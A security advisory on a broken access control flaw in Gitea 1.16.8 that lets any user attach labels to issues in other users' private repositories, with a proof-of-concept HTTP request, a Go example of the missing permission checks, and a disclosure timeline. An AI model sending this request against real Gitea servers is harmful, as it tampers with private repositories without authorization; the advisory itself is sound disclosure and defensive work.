usd-2022-0026 | Broken Access Control in Gitea Issue Labels

Advisory ID: usd-2022-0026
Product: Gitea
Affected Version: 1.16.8
Vulnerability Type: https://cwe.mitre.org/data/definitions/284.html
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: Not published yet
Last Update: 2022-06-30

Introduction

Gitea allows users to add labels to issues. Due to improper access control, it is possible for any user to add labels to any issue.

Proof of Concept

Issue labels can be attached to issues that the requesting user is not authorized to access.
In the example below, issue_id 7 is an issue in a private repository of another user.

4091 is the label id. The label must exist in the target repository.

POST /testuser/test222/issues/labels HTTP/1.1
Host: localhost:3000
Content-Length: 94
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close


_csrf=rmB[...]&action=attach&issue_ids=7&id=4091

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.
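As an added illustration of this recommendation, not code from Gitea itself, the Go snippet below shows the shape of the check a label-attach handler needs: write access to the repository named in the request path is required up front, and every submitted label and issue id must belong to that same repository, so an issue_id pointing into another user's private repository is rejected. The Store type, user ids and repository ids are constructed for the example; label 4091 and issue 7 mirror the advisory's request.

```go
package main

import "errors"

// Constructed in-memory model for illustration; these are not Gitea's real types.
type Issue struct{ ID, RepoID int64 }
type Label struct{ ID, RepoID int64 }

type Store struct {
	Issues  map[int64]Issue
	Labels  map[int64]Label
	Writers map[int64]map[int64]bool // repoID -> user ids with write access
}

var ErrForbidden = errors.New("forbidden: not in this repository or no write access")

// AttachLabel is the hardened form of "action=attach": the caller's permission and
// every submitted id are checked against the repository in the request path before
// any label is attached. Only the checks are shown; the write itself is omitted.
func (s *Store) AttachLabel(userID, pathRepoID, labelID int64, issueIDs []int64) error {
	if !s.Writers[pathRepoID][userID] {
		return ErrForbidden // deny by default: no write access to this repository
	}
	if l, ok := s.Labels[labelID]; !ok || l.RepoID != pathRepoID {
		return ErrForbidden // the label must belong to the path repository
	}
	for _, id := range issueIDs {
		iss, ok := s.Issues[id]
		if !ok || iss.RepoID != pathRepoID {
			return ErrForbidden // issue from another repository: reject the whole request
		}
	}
	return nil
}

// DemoStore builds the advisory's scenario with constructed ids: repo 1 is the caller's
// repository and holds label 4091; issue 7 lives in repo 2, another user's private repo.
func DemoStore() *Store {
	return &Store{
		Issues:  map[int64]Issue{3: {3, 1}, 7: {7, 2}},
		Labels:  map[int64]Label{4091: {4091, 1}},
		Writers: map[int64]map[int64]bool{1: {10: true}, 2: {20: true}},
	}
}
```

Calling AttachLabel(10, 1, 4091, []int64{7}) on DemoStore reproduces the advisory's request and returns ErrForbidden, while the same call for issue 3 (which belongs to repo 1) succeeds.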

References

Timeline

  • 2022-06-22: Vulnerability identified by Christian Pöschl
  • 2022-06-22: First contact request
  • 2022-07-01: Investigation started by vendor
  • 2022-07-15: Vendor confirms remediation
  • 2024-05-29: This advisory is published

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.